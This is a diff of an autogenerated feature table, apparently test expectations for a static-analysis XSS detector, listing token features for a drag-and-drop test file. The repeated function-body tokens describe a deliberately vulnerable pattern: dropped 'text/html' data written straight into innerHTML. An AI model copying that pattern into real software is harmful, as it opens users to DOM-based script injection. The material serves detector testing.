dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:36:2:56:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:11 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:11 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:11 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:11 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:11 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div = d ... ("div") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div = d ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div = d ... ("div") | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div = d ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:9:37:43 | div = d ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:22 | document | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:22 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:22 | document | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:22 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:22 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:36 | documen ... Element | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:36 | documen ... Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:36 | documen ... Element | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:36 | documen ... Element | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:36 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | documen ... ("div") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | documen ... ("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | documen ... ("div") | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | documen ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | documen ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | exceptional return of documen ... ("div") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | exceptional return of documen ... ("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | exceptional return of documen ... ("div") | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | exceptional return of documen ... ("div") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:15:37:43 | exceptional return of documen ... ("div") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:24:37:36 | createElement | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:24:37:36 | createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:24:37:36 | createElement | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:24:37:36 | createElement | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:24:37:36 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:38:37:42 | "div" | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:38:37:42 | "div" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:38:37:42 | "div" | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13532,6 +100230,157 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:38:37:42 | "div" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:38:37:42 | "div" | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:37:38:37:42 | "div" | receiverName | document | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:7 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:7 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:7 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:7 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:7 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:14 | div.ondrop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:14 | div.ondrop | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:14 | div.ondrop | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:14 | div.ondrop | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:38:14 | div.ondrop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:55:5 | div.ond ... ;\\n } | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:55:5 | div.ond ... ;\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:55:5 | div.ond ... ;\\n } | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:55:5 | div.ond ... ;\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:5:55:5 | div.ond ... ;\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:9:38:14 | ondrop | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:9:38:14 | ondrop | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:9:38:14 | ondrop | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:9:38:14 | ondrop | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:9:38:14 | ondrop | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:38:17 | this | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:38:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:38:17 | this | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:38:17 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:38:17 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | 'arguments' object of anonymous function | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | exceptional return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | exceptional return of anonymous function | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | functio ... ;\\n } | assignedToPropName | ondrop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | functio ... ;\\n } | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | functio ... ;\\n } | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | functio ... ;\\n } | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | functio ... ;\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | functio ... ;\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | return of anonymous function | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:18:55:5 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:38:28:38:28 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:30 | { dataTransfer } | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:30 | { dataTransfer } | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:30 | { dataTransfer } | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:30 | { dataTransfer } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:30 | { dataTransfer } | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | { dataTransfer } = e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | { dataTransfer } = e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | { dataTransfer } = e | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | { dataTransfer } = e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:15:39:34 | { dataTransfer } = e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:17:39:28 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:34:39:34 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:34:39:34 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:34:39:34 | e | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:34:39:34 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:39:34:39:34 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:13:40:25 | !dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:13:40:25 | !dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:13:40:25 | !dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:13:40:25 | !dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:13:40:25 | !dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:40:14:40:25 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:18 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:18 | text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:18 | text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:18 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:18 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text = ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text = ... plain') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text = ... plain') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text = ... plain') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:15:42:55 | text = ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:33 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:33 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:33 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:33 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:33 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:41 | dataTransfer.getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:41 | dataTransfer.getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:41 | dataTransfer.getData | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:41 | dataTransfer.getData | enclosingFunctionName | | +| 